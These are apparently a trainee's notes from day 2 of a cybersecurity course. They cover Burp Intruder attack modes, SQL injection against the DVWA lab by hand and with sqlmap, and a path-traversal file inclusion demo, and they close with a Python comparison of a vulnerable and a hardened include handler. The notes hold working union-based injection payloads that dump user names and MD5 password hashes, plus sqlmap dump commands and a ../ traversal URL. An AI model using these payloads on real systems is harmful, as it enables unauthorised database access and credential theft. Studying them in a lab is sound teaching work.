[Cybersecurity 1x02] Anheng (安恒) vendor cybersecurity training --- day 2

Morning: Burp Suite's brute-force module (Intruder) and its four attack types, then installing Kali.

Afternoon: SQL injection, both by hand and with sqlmap, and with the little time left a quick look at file inclusion vulnerabilities.

Burp Suite - Intruder

After intercepting a request, right-click it and choose Send to Intruder to brute-force it. Taking the request body below as an example, the parts wrapped in §§, marked (1) and (2), are the payload positions to attack:

user=§user§&password=§password§&imageField.x=17&imageField.y=1
     (1)         (2)
----------------------------------------------------------
payload1 = [user1,user2,user3]
payload2 = [pass1,pass2,pass3]
----------------------------------------------------------

The four attack types are:

Sniper

Substitutes the payloads into (1) and (2) one position at a time; while one position is being attacked, the other keeps its original value.

Only one payload set can be configured. Using payload2, the attempts run in this order:

No.   user (1)   password (2)
1     pass1      password
2     pass2      password
3     pass3      password
4     user       pass1
5     user       pass2
6     user       pass3

Battering ram

Puts the same payload into every selected position at once.

Again only one payload set can be configured. Using payload2, the order is:

No.   user (1)   password (2)
1     pass1      pass1
2     pass2      pass2
3     pass3      pass3

Pitchfork

Walks payload1 through (1) and payload2 through (2) in lockstep, pairing the n-th entry of each list; the attack stops as soon as the shorter list is exhausted.

One payload set per position (from 1 up to the number of positions). Using payload1 and payload2, the order is:

No.   user (1)   password (2)
1     user1      pass1
2     user2      pass2
3     user3      pass3

Equivalent Python (payload1 and payload2 are the lists defined above):

for i in range(min(len(payload1), len(payload2))):   # stop at the shorter list
    user = payload1[i]
    password = payload2[i]

Cluster bomb

The usual exhaustive search: every combination of the payload sets (their Cartesian product).

One payload set per position (from 1 up to the number of positions). Using payload1 and payload2, the order is:

No.   user (1)   password (2)
1     user1      pass1
2     user2      pass1
3     user3      pass1
4     user1      pass2
5     user2      pass2
6     user3      pass2
7     user1      pass3
8     user2      pass3
9     user3      pass3

Equivalent Python. Burp advances position (1) fastest, so the list for position (2) is the outer loop, and the loop variables (not the whole lists) are what get assigned:

for j in payload2:          # outer loop: position (2), changes slowest
    for i in payload1:      # inner loop: position (1), changes fastest, as in the table
        user = i
        password = j

Kali

Already installed it earlier; installing in a VM follows the same procedure:

http://got17.cn/1010/

SQL injection

SQL injection vulnerability - low (DVWA security level)

1. Determine the injection type

    1' or '1' = '1

   If every row comes back, the input lands inside a single-quoted string (string-type injection) and the closing quote can be supplied by the payload.

2. Find the number of columns

    1' or 'a' = 'a' order by 1 #
    1' or 'a' = 'a' order by 2 #
    1' or 'a' = 'a' order by ... #
    # binary search over 0~n: ORDER BY n succeeds while n is at most the column count and errors once it exceeds it

3. Find which columns are echoed

    1' union select 1,2 #

    # echoed output
    ID: 1' union select 1,2 #
    First name: admin
    Surname: admin

    ID: 1' union select 1,2 #
    First name: 1
    Surname: 2

   The second block is the union row: both columns are echoed, so either can carry extracted data.
4. Get the database name

    1' union select 1,database() #

    # echoed output
    ID: 1' union select 1,database() #
    First name: admin
    Surname: admin

    ID: 1' union select 1,database() #
    First name: 1
    Surname: dvwa
5. List the tables in the database

    1' union select 1,group_concat(table_name) from information_schema.tables where table_schema=database() #

    # echoed output
    ID: 1' union select 1,group_concat(table_name) from information_schema.tables where table_schema=database() #
    First name: admin
    Surname: admin

    ID: 1' union select 1,group_concat(table_name) from information_schema.tables where table_schema=database() #
    First name: 1
    Surname: guestbook,users

   group_concat folds all table names into one row, which matters because the page only echoes one row of the union.
6. List the columns of a table

    1' union select 1,group_concat(column_name) from information_schema.columns where table_name='users' #

    # echoed output
    ID: 1' union select 1,group_concat(column_name) from information_schema.columns where table_name='users' #
    First name: admin
    Surname: admin

    ID: 1' union select 1,group_concat(column_name) from information_schema.columns where table_name='users' #
    First name: 1
    Surname: user_id,first_name,last_name,user,password,avatar

   Note that this filters on table_name only; if another database on the same server also has a users table, its columns are mixed in. Adding and table_schema=database() to the WHERE clause restricts the result to the current database.
7. Dump the data

    1' or 1 = 1 union select group_concat(user_id,first_name,last_name),group_concat(password) from users #

    # echoed output
    ID: 1' or 1 = 1 union select group_concat(user_id,first_name,last_name),group_concat(password) from users #
    First name: admin
    Surname: admin

    ID: 1' or 1 = 1 union select group_concat(user_id,first_name,last_name),group_concat(password) from users #
    First name: Gordon
    Surname: Brown

    ID: 1' or 1 = 1 union select group_concat(user_id,first_name,last_name),group_concat(password) from users #
    First name: Hack
    Surname: Me

    ID: 1' or 1 = 1 union select group_concat(user_id,first_name,last_name),group_concat(password) from users #
    First name: Pablo
    Surname: Picasso

    ID: 1' or 1 = 1 union select group_concat(user_id,first_name,last_name),group_concat(password) from users #
    First name: Bob
    Surname: Smith

    ID: 1' or 1 = 1 union select group_concat(user_id,first_name,last_name),group_concat(password) from users #
    First name: 1adminadmin,2GordonBrown,3HackMe,4PabloPicasso,5BobSmith
    Surname: 5f4dcc3b5aa765d61d8327deb882cf99,e99a18c428cb38d5f260853678922e03,8d3533d75ae2c3966d7e0d4fcc69216b,0d107d09f5bbe40cade3de5c71e9e9b7,5f4dcc3b5aa765d61d8327deb882cf99

   Because of or 1 = 1 the five real rows are printed first; the last block is the union row, with user_id, first and last name concatenated in the first column and every password in the second, both comma-joined by group_concat. The password values are 32-hex-character unsalted MD5 digests (5f4dcc3b5aa765d61d8327deb882cf99 is md5("password")), which is why DVWA's stock accounts crack instantly.

sqlmap

# sqlmap -u [url] needs the session cookie (DVWA requires a login, and the security level is also carried in a cookie);
# easiest is to capture the request in Burp Suite, save it to a file, and pass that file to sqlmap with -r

sqlmap -r get.txt --dbs

sqlmap -r get.txt -D dvwa --tables

sqlmap -r get.txt -D dvwa -T users --columns

sqlmap -r get.txt -D dvwa -T users -C "user,password" --dump

File inclusion vulnerability

http://localhost/dvwa/vulnerabilities/fi/?page=file1.php

# change the path after ?page= ; each ../ climbs one directory, so two of them reach dvwa/robots.txt
http://localhost/dvwa/vulnerabilities/fi/?page=../../robots.txt
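As an added example (not DVWA's code), a Python stand-in for the include($_GET['page']) behaviour behind that URL, beside a hardened version. The directory tree (vulnerabilities/fi/file1.php with robots.txt two levels up, mirroring the URL) is constructed in a temporary directory, and the allowlist of page names is an assumption of this example.

```python
import os
import tempfile

# Constructed page contents, so the example runs offline.
FILE1_BODY = "<?php echo 'file1'; ?>"
ROBOTS_BODY = "User-agent: *\nDisallow: /\n"

# Assumed allowlist: the only pages the include handler is meant to serve.
ALLOWED_PAGES = {"file1.php", "file2.php", "file3.php"}


def build_webroot():
    """Create <root>/vulnerabilities/fi/file1.php and <root>/robots.txt, mirroring the URL layout."""
    root = tempfile.mkdtemp(prefix="dvwa-fi-")
    fi_dir = os.path.join(root, "vulnerabilities", "fi")
    os.makedirs(fi_dir)
    with open(os.path.join(fi_dir, "file1.php"), "w") as f:
        f.write(FILE1_BODY)
    with open(os.path.join(root, "robots.txt"), "w") as f:
        f.write(ROBOTS_BODY)
    return root


def include_vulnerable(root, page):
    """include($_GET['page']) behaviour: whatever path is given is resolved relative to fi/,
    so ../../robots.txt walks out of the include directory."""
    path = os.path.join(root, "vulnerabilities", "fi", page)
    with open(path) as f:
        return f.read()


def include_safe(root, page):
    """Two independent checks: an allowlist of page names, and a realpath containment
    check that stops ../ and symlink escapes even if the allowlist is later loosened."""
    if page not in ALLOWED_PAGES:
        raise PermissionError(f"page not allowed: {page!r}")
    base = os.path.realpath(os.path.join(root, "vulnerabilities", "fi"))
    target = os.path.realpath(os.path.join(base, page))
    if os.path.commonpath([base, target]) != base:
        raise PermissionError(f"path escapes include directory: {page!r}")
    with open(target) as f:
        return f.read()


if __name__ == "__main__":
    root = build_webroot()
    print(include_vulnerable(root, "file1.php"))
    print(include_vulnerable(root, "../../robots.txt"))   # traversal succeeds
    try:
        include_safe(root, "../../robots.txt")
    except PermissionError as e:
        print("blocked:", e)
```

The allowlist alone would already block the traversal; the realpath check is kept because allowlists tend to grow into prefix or extension matches over time, and containment is the check that survives that.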